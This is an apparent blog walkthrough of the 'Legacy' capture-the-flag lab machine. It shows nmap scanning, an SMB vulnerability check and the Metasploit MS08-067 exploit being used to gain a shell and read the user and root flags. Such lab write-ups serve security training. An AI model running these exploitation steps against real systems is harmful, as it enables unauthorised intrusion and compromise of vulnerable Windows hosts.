top of page

Legacy


As usual let's start with nmap:

nmap -sV -sC 10.129.1.111

We are told to use -Pn so let's try that

nmap -Pn -sC 10.129.1.111

Port 445 is open which is SMB so let's check it with:

smbclient -L 10.129.1.111

It doesn't seem to be working so let's move on. Let's use nmap again but this time looking for any vulnerabilities on port 445

nmap -Pn -p 445 --script vuln 10.129.1.111

Let's see if metasploit got an exploit available for ms08-067

msfconsole

Now let's type:

search ms08-067

There is 1 exploit so let's use this one

use exploit/windows/smb/ms08_067_netapi

show options

Looks like we only need to set up LHOST and RHOSTS as LPORT and RPORT are already setup to the default.


set LHOST 10.10.14.10

This is the IP of the attacker so your IP. If you don't know IP, open a new command prompt and type ifconfig


set RHOSTS 10.129.1.111

This is the IP of the remote host, so the target machine

Type:

exploit

Now we are in!

Type:

cd "Documents and Settings"
ls

cd john
cd Desktop
ls
cat user.txt

Congratulations! You got the user flag!



Now let's go get the root flag. Type:

cd "Documents and Settings"
cd Administrator
ls
cat root.txt

Congratulations! You got the root flag!

173 views0 comments

Recent Posts

See All

Previse

Backdoor

Lame

Comments

Rated 0 out of 5 stars.
No ratings yet

Add a rating
bottom of page